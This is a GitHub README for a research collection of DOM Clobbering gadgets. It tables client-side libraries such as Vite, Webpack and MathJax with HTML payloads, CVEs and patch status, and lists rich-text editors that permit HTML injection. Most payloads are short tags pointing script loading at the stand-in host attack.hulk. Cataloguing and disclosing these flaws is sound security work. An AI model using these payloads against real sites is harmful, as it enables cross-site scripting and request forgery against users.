Skip to content

Latest commit

 

History

History
81 lines (67 loc) · 10.7 KB

README.md

File metadata and controls

81 lines (67 loc) · 10.7 KB

DOM Clobbering Collection

This repository maintains a list of client-side library that is vulnerable to HTML injection or contains DOM Clobbering gadgets that can result in severe issues like XSS.

This repository is actively maintained by jackfromeast and ishmeal.

Note

Got new gadgets or HTML injections? Please feel free to create a Pull Request and join the house!

What is DOM Clobbering?

DOM Clobbering is a type of code-less injection attack on the web where attackers first inject a seemingly benign, scriptless HTML markup into a webpage. Then, the injected markup could be unexpectedly loaded by JavaScript through collided named property lookups on the window or document objects, potentially altering program execution and leading to serious security risks such as Cross-site Scripting (XSS) and Client-side Request Forgery (CSRF).

We also recommend checking out the following great websites, papers, and blog posts about DOM Clobbering:

DOM Clobbering Gadgets

Want to try out the gadgets?

We provide a website hosting Proof-of-Concept (PoC) pages for each DOM Clobbering gadget in our collection. To set it up locally, click here.

Library Stars Version Payloads Impact Found By Status CVE
Vite 67.2K v5.4.5 <img src="https://attack.hulk" name="currentScript"> XSS TheHulk Patched CVE-2024-45812
Webpack 64.4K v5.93.0 <img name="currentScript" src="https://attack.hulk"></img> XSS TheHulk Patched CVE-2024-43788
Astro 45.7K v4.5.9 <form name="scripts">alert(1)</form><form name="scripts">alert(1)</form> XSS TheHulk Fixed CVE-2024-47885
layui 29.5K v2.9.16 <img name="currentScript" src="https://attack.hulk"> XSS TheHulk Patched CVE-2024-47075
rollup 25.2K v4.21.3 <img src="https://attack.hulk" name="currentScript"> XSS TheHulk Fixed CVE-2024-47068
plausible-analytics 19.7K v2.1.0 <img name="currentScript" data-domain="attack.hulk" data-api="https://attack.hulk"> CSRF TheHulk Reported N/A
plotly.js 16.9K v2.35.2 <a id="PLOTLYENV"></a><a id="PLOTLYENV" name="BASE_URL" href="https://attack.hulk/?a="></a> CSRF TheHulk Reported N/A
Prism 12.2K v1.29.0 <img name="currentScript" src="https://attack.hulk/a.js"></img> XSS TheHulk Reported CVE-2024-53382
MathJax 10.1K v2.7.x <a id="MathJax"></a> <a id="MathJax" name="root" href="https://attack.hulk"></a> XSS TheHulk Accepted N/A
MathJax 10.1K v3.2.2 <img name="currentScript" src="https://attack.hulk"></img> $$\require{tex}$$ XSS TheHulk Accepted N/A
tsup 8.9K v8.3.4 <img src="https://attack.hulk" name="currentScript"> XSS TheHulk Reported CVE-2024-53384
rspack 8.6K v1.0.0-rc.0 <img name="currentScript" src="https://attack.hulk"></img> XSS TheHulk Fixed CVE-2024-43788
seajs 8.3K v3.0.3 <img name="scripts" src="https://attack.hulk"><img name="scripts" src="https://attack.hulk"> XSS TheHulk Reported CVE-2024-51091
Google Closure 4.9K v20230103 <img name="currentScript" src="https://attack.hulk/base.js"></img> XSS TheHulk Accepted N/A
pagefind 3.3K v1.1.0 <img name="currentScript" src="blob:https://attack.hulk/ui.js"></img> XSS TheHulk Accepted CVE-2024-45389
Mavo 2.8K v0.3.2 <img name="currentScript" src="https://attack.hulk"></img> XSS TheHulk Reported CVE-2024-53388
cusdis 2.6K v1.3.0 <img name="currentScript" data-host="https://attack.hulk"> XSS TheHulk Reported CVE-2024-49213
Stage.js 2.4K 0.8.10 <img name="currentScript" src="https://attack.hulk"></img> XSS TheHulk Reported CVE-2024-53386
curl 1.8K v0.8.13 <img name="scripts" data-curl-run="http://attack.hulk/"><img name="scripts" data-curl-run="http://attack.hulk"> XSS TheHulk Reported CVE-2024-49212
inspire.js 1.7K v1.10 <img name="currentScript" src="https://attack.hulk"></img> XSS TheHulk Reported CVE-2024-53385
steal 1.4K v2.3.0 <img name="currentScript" src="https://attack.hulk"><img> XSS TheHulk Accepted CVE-2024-45939
UMeditor 1.4K v1.2.2 <a id="UMEDITOR_HOME_URL" href="https://attack.hulk/"></a> XSS TheHulk Reported CVE-2024-53387
squirt 1.2K v0.0.1 <img name="scripts" src="http://attack.hulk"><img name="scripts" src="http://attack.hulk"> XSS TheHulk Reported N/A
ckplayer 1.1K latest <img name="scripts" src="https://attack.hulk/js/"><img name="scripts" src="https://attack.hulk/js/"> XSS TheHulk Reported N/A
polyfills 1.1K v2.8.0 <a id="ShadyDOM"></a><a id="ShadyDOM" name="force"></a><a id="WebComponents"></a><a id="WebComponents" name="root" href="https://attack.hulk"></a> XSS TheHulk Reported N/A
doomcaptcha 1K latest <img name="currentScript" label="<script>alert(1)</script>"></img> XSS TheHulk Reported N/A
AddToAny N/A N/A <img src="https://addtoany.xxx.xxx" name="currentScript"> XSS TheHulk Patched N/A
Google Client API N/A 5BIk7BglYEE <iframe name="scripts" src=”https://apis.google.com/js/api.js”></iframe><iframe name="scripts" src=”https://apis.google.com/js/api.js”>alert(1)</iframe> XSS TheHulk Patched N/A

HTML Injection Vulnerabilities

The following libraries accept user input and output content as type/html with certain named attributes (e.g., id or name) preserved at different levels of capability. Using these libraries may expose web applications to HTML injection risks. Libraries may directly insert user input into the DOM, or the web application may retrieve the user input from the library and then add it to the DOM.

Library Stars Version Input Sanitizer Capability
mermaid 70.6K v0.1.4 Input DOMPurify Any named property without collision
tui.editor 17.1K v3.2.2 Type DOMPurify Any named property without collision
TinyMCE-v5/6/7 14.9K v7.3.0 Copy&Paste DOMPurify Any named property without collision
TinyMCE-v4 14.9K v4.9.11 Copy&Paste N/A Any named property
editor.md 13.8K v1.5.0 Type N/A Any named property
simplemde 9.9K v1.11.2 Type N/A Any named property
vditor 8.3K v3.10.6 Type N/A Any named property
Froala 5.3K v4.2.2 Copy&Paste DOMPurify Any name attributes
Zenpen 3.8K latest Copy&Paste N/A Any named attributes
editor 2.8K v0.1.0 Type N/A Any named property
kindeditor 1.9K v4.1.12 Copy&Paste N/A Any named property
SunEditor 1.7K v2.47.0 Copy&Paste N/A a tag with id
RichTextEditor N/A Latest Copy&Paste N/A Any named property